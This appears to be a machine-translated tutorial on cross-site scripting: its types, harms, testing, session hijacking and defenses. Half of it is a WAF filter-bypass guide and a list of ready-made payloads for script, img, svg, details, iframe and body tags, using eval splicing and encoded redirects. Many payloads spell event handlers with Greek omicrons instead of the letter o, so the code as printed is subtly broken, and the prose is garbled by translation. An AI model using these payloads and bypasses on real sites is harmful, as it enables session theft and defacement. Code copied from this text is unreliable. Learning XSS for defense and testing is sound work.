principle

         An attacker embeds a client script in a web page , Usually JavaScript Malicious code written , When a user uses a browser to browse a web page embedded with malicious code , Malicious code will be executed on the user's browser , Send the user's information to the attacker .

classification

         reflective

         reflective XSS Also known as non persistence XSS, It's one of the easiest things to do now XSS Loophole . When a user accesses a with XSS Code URL When asked , The server receives data and processes it , Then put the belt with XSS Code data sent to the browser , The browser parses this section with XSS Code data after , It eventually results in XSS Loophole . This process is like a reflection , So it's called reflex XSS.

         Storage type

         That allows users to store data Web Any application may have a storage type XSS Loophole , When an attacker submits a paragraph XSS After code , Received and stored by the server , When a user accesses the application , This paragraph XSS The code is read by the program and responded to the browser , cause XSS Cross Station attack , This is the storage type XSS.

        DOM type

        DOM The full name is Document Object Model, The document object model ,DOM Usually used to represent HTML、XHTML and XML Objects in the . Use DOM Programs and scripts can be allowed to dynamically access and update the contents of documents 、 junction
Structure and style . adopt JavaScript You can reconstruct the whole HTML page , Instead, you need to reconstruct the page or an object in the page , JavaScript We need to know HTML Of all elements in the document “ Location ”. and DOM Provides a structured representation of the document , It also defines how to access the document structure through scripts . according to DOM Regulations ,HTML Each component in the document is a node .

harm

1. Website hanging horse
2. Stealing users Cookie
3. Modify page content

4. Use website redirection

5.XSS worm

testing XSS

        Manual testing

        1、 Find all the places you can type .

        2、 Enter special characters where they are entered , Make sure you can see where its output is .

        3、 According to the output format , Analyze how the server filters data , Design may bypass payload Do the bypass test .

        4、 When the output position is not known , You can use      "/>XSS Test"    To test .

        Automatic detection

         Like used before APPSCAN、AWVS、Burp Suite Such as software , Can effectively detect XSS Cross site loopholes , However, this kind of large-scale missing scanning tool can not be used for detection XSS Outside , Also detect  SQL injection 、 File contains 、 Vulnerabilities such as application errors . Although such large missed scans can be configured to detect only XSS, But not as professional XSS High efficiency of testing tools .
         Professional XSS There are many scanning tools , Like the famous XSSER、XSSF  All good choices . There are also security enthusiasts who have made scans XSS Loopholes Web service , Such as : http://www.domxssscanner.com/, Designed to scan DOM Type of XSS, SMS verification may be required when submitting a message 、 Verification code filling, etc , Tools can't do it .

Utilization mode

        Session hijacking

         Conditions ： Server only Use Cookie As user authentication information .

         principle ： utilize XSS After the attack, the user can obtain the user authentication login cookie Information , stay cookie Before the information is invalid , The attacker takes advantage of the user's cookie Information to log in to the user's account , No user name and password required .

        Defense methods ： add to HttpOnly（ Added HttpOnly Of Cookie Will not be accessed by the browser ）.

        XSS platform

         XSSPlatform: Is a XSS Exploit the framework composed of code , This includes the most basic acquisition Cookie、 obtain HTML Code 、 Keyboard record 、 Basic authentication fishing and other functions .

defense

        Filter ： Strictly filter the data entered by users .

        escape ： Escape sensitive characters .

         code ： Entity code the data entered by the user .

        add to HttpOnly Field

Bypass

         Common filter bypass methods

         Space filtering ： When spaces are filtered , We can use  /  Instead of spaces ：

         Quote filtering ： If it is html In the label , We can use no quotation marks . If it's in js in , We can use back quotation marks instead of single and double quotation marks .<img src=x οnerrοr=alert(`xss`);>

         Bracket filtering ： When parentheses are filtered, you can use throw To bypass .throw Statement is used to throw an error when an error occurs .<img src=x οnerrοr="javascript:window.οnerrοr=alert;throw 1">

         Keyword filtering

                 Double write ： There are some waf It may be replaced only once and empty , In this case, we can consider double writing keywords to bypass .<scrscriptipt>alert(1);</scrscriptipt>

                 Case write ：<sCRiPt>alert(1);</sCrIpT>

         String splicing bypasses ： utilize eval() function ,JavaScript Of eval() Functions can also calculate JavaScript character string , And execute it as script code .<img src="x" οnerrοr="a='aler';b='t';c='(1)';eval(a+b+c)"> <img src="x" οnerrοr="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">

        Code bypass ：Unicode Code bypass 、url Code bypass 、Ascii Code bypass 、hex Bypass 、base64 Bypass

        Filter url Address ：

                 Use url code ：<img src="x" οnerrοr=document.location=`http://%77%77%77%2e %62%61%69%64%75%2e%63%6f%6d/`>

                 Use IP： Decimal system IP、 octal IP、hex、html Use... In the label // Can replace http://、 Use \\（ stay windows Next \ It has a special purpose , It's a path Writing , therefore \\ stay Windows Next is file agreement , stay linux The following is the protocol of the current domain ）、 Use Chinese commas instead of English commas （ If you enter a Chinese period in your domain name, the browser will automatically convert it into an English comma ）

         Single quote closure +htmlspecialchars Function bypasses ：'οnmοuseοver='alert(/xss/)

        JavaScript Fake protocol ："><a href=javascript:alert(/xss/)>                 o_n and <scr_ipt> Filter

common payload

1.script label

        <script>alert(1);</script>

        <script>alert("xss");</script>

2.img label

        <img src=1 οnerrοr=alert(1);>

        <img src=1 οnerrοr=alert("xss");>

3.input label

        <input οnfοcus=alert(1);>        onfocus Event occurs when the object gets focus

        <input οnblur=alert(1) autofocus><input autofocus>    The focus of competition , triggering onblur event ：

        input Labeled autofocus Property specifies that when the page loads Elements should automatically get focus . Can pass autofocus Property automatically executes its own focus event , This vector makes the focus automatically jump to the input element , Trigger focus event , There is no need for the user to trigger .

4.details label

        <details οntοggle=alert(1);>

        <details> Tags provide interactive controls for users to turn on and off , Specifies additional details of user visible or hidden requirements .ontoggle Event specifies when the user opens or closes <details> Element when triggered .

        <details open οntοggle=alert(1);>

         Use details Labeled open Property trigger ontoggle event , No user clicks to trigger .

5.svg label

        <svg οnlοad=alert(1);>

        <svg> Labels are used to HTML Embedded directly in the page SVG File code .

6.select label

        <select οnfοcus=alert(1)></select>        <select> Tags are used to create drop-down lists .

        <select οnfοcus=alert(1) autofocus>

         adopt autofocus Property specifies that the element should automatically get focus when the page is loaded , This vector makes the focus automatically jump to the input element , Trigger focus event , There is no need for the user to trigger .

7.iframe label

        <iframe οnlοad=alert(1);></iframe>

        <iframe> The tag creates an inline frame containing another document .

8.video label

        <video><source οnerrοr=alert(1)>

        <video> Tag definition video , Like movie clips or other video streams .

9.audio label

        <audio src=x  οnerrοr=alert(1);>

        <audio> Tags define sounds , Like music or other audio streams .

10.body label

        <body οnlοad=alert(1);>                <body> Tags define the body of the document .

        <body
        οnscrοll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

        onscroll Event is triggered when the element scroll bar scrolls . We can use line breaks and autofocus, Automatically triggered when the user slides the scroll bar , There is no need for the user to click to trigger .

11.textarea label

        <textarea οnfοcus=alert(1); autofocus>

        <textarea> Tag defines a multi line text input control .